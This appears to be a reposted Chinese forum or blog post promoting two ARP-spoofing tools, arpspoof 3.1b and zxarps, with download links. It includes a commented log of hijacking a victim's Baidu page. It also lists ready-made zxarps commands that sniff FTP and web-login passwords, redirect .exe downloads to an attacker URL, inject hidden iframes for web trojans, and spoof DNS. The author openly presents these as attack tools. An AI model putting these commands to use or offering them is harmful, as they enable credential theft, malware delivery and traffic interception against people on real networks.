最近幻影的两个ARP欺骗工具 挺不错的
?arpspoof 3.1b
主要功能:ARP欺騙過程中進(jìn)行數(shù)據(jù)修改,實(shí)現(xiàn)會話劫持攻擊
說明: 本程序公開源代碼,為了換取更多朋友的指教
實(shí)例: 欺騙192.168.0.108訪問百度網(wǎng)站的全過程(注:#后是我加的注釋)
效果: 192.168.0.108看到的百度首頁只有一句話“Hack by cooldiyer”,攻擊成功。
圖解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自動生成的規(guī)則文件,就能搞定
F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加載文件job.txt中的規(guī)則,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加載了兩條規(guī)則,如果文件格式不對,程序在這里會中斷
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 開始arpspoof欺騙,監(jiān)視轉(zhuǎn)發(fā)的數(shù)據(jù)包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一個需要轉(zhuǎn)發(fā)的數(shù)據(jù)包,但沒找到要替換的字符串
[*] Forwarding untouched packet of size 62 # 所以直接轉(zhuǎn)發(fā)出去,以下幾個也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一個需要轉(zhuǎn)發(fā)的數(shù)據(jù)包,找到了要替換的內(nèi)容,應(yīng)用規(guī)則。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替換成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 給出提示這個數(shù)據(jù)包被替換了多少次,替換后包的大小 (調(diào)試用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自動恢復(fù)受騙主機(jī)的ARP緩存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________
其它說明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存數(shù)據(jù)到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只顯示數(shù)據(jù)
被替換的字符串要盡可能的短,這樣能減少程序負(fù)擔(dān),可參考arpspoof /n生成的規(guī)則文件job.txt
需要說的是程序在公網(wǎng)下照樣使用,我已經(jīng)解說過了,不再舉例.........
規(guī)則文件的使用可以看程序的書寫,本程序開放源代碼
希望測試出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12
下載:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp
zxarps
在當(dāng)今網(wǎng)馬橫飛的日子,我帖個東東,讓網(wǎng)馬飛得更猛烈些吧
說明:
需要winPcap
基于arp欺騙,
具體功能看下面的使用說明~~~懶得打太多字了~~~
一些注意:
通常欺騙都是針對 網(wǎng)關(guān)和同網(wǎng)段下的其他機(jī),所以-sethost [ip] 參數(shù)可以不填,
但如果同網(wǎng)段下有某server,而你想嗅探其他用戶到該server的數(shù)據(jù)就要-sethost serverIP
Codz:
0. Realtek RTL8139 ????IP Address. . . . . : 192.168.1.101 ????Physical Address. . : 00-11-D8-6B-5E-19 ????Default Gateway . . : 192.168.1.1 1. WAN (PPP/SLIP) Interface ????IP Address. . . . . : xx.xx.xx.xx ????Physical Address. . : 00-52-00-00-00-00 ????Default Gateway . . : xx.xx.xx.xx options: ????-idx [index]???????網(wǎng)卡索引號 ????-ip [ip]???????????欺騙的IP,用'-'指定范圍,','隔開 ????-sethost [ip]??????默認(rèn)是網(wǎng)關(guān),可以指定別的IP ????-port [port]???????關(guān)注的端口,用'-'指定范圍,','隔開,沒指定默認(rèn)關(guān)注所有端口 ????-reset?????????????恢復(fù)目標(biāo)機(jī)的ARP表 ????-hostname??????????探測主機(jī)時獲取主機(jī)名信息 ????-logfilter [string]設(shè)置保存數(shù)據(jù)的條件,必須+-_做前綴,后跟關(guān)鍵字, ???????????????????????','隔開關(guān)鍵字,多個條件'|'隔開 ???????????????????????所有帶+前綴的關(guān)鍵字都出現(xiàn)的包則寫入文件 ???????????????????????帶-前綴的關(guān)鍵字出現(xiàn)的包不寫入文件 ???????????????????????帶_前綴的關(guān)鍵字一個符合則寫入文件(如有+-條件也要符合) ????-save_a [filename] 將捕捉到的數(shù)據(jù)寫入文件 ACSII模式 ????-save_h [filename] HEX模式 ????-hacksite [ip]?????指定要插入代碼的站點(diǎn)域名或IP, ???????????????????????多個可用','隔開,沒指定則影響所有站點(diǎn) ????-insert [html code]指定要插入html代碼 ????-postfix [string]??關(guān)注的后綴名,只關(guān)注HTTP/1.1 302 ????-hackURL [url]?????發(fā)現(xiàn)關(guān)注的后綴名后修改URL到新的URL ????-filename [name]???新URL上有效的資源文件名 ????-hackdns [string]??DNS欺騙,只修改UDP的報(bào)文,多個可用','隔開 ???????????????????????格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 ????-Interval [ms]?????定時欺騙的時間間隔,單位:毫秒:默認(rèn)是3000 ms ????-spoofmode [1|2|3] 將數(shù)據(jù)騙發(fā)到本機(jī),欺騙對象:1為網(wǎng)關(guān),2為目標(biāo)機(jī),3為兩者(默認(rèn)) ????-speed [kb]????????限制指定的IP或IP段的網(wǎng)絡(luò)總帶寬,單位:KB example: ????嗅探指定的IP段中端口80的數(shù)據(jù),并以HEX模式寫入文件 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log ????FTP嗅探,在21或2121端口中出現(xiàn)USER或PASS的數(shù)據(jù)包記錄到文件 ????zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log ????HTTP web郵箱登陸或一些論壇登陸的嗅探,根據(jù)情況自行改關(guān)鍵字 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log ????用|添加嗅探條件,這樣FTP和HTTP的一些敏感關(guān)鍵字可以一起嗅探 ????zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log ????如果嗅探到目標(biāo)下載文件后綴是exe等則更改Location:為http://xx.net/test.exe ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe ????指定的IP段中的用戶訪問到-hacksite中的網(wǎng)址則只顯示just for fun ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>" ????指定的IP段中的用戶訪問的所有網(wǎng)站都插入一個框架代碼 ????zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>" ????指定的兩個IP的總帶寬限制到20KB ????zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 ????DNS欺騙 ????zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1" zxarps Build 01/19/2007 By LZX. |
?
下載:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp
???????????再分享一下我老師大神的人工智能教程吧。零基礎(chǔ)!通俗易懂!風(fēng)趣幽默!還帶黃段子!希望你也加入到我們?nèi)斯ぶ悄艿年?duì)伍中來!https://blog.csdn.net/jiangjunshow
總結(jié)
以上是生活随笔為你收集整理的最近幻影的两个ARP欺骗工具 挺不错的的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: maven引入阿里云镜像源(Maven下
- 下一篇: 微信小程序开发常用代码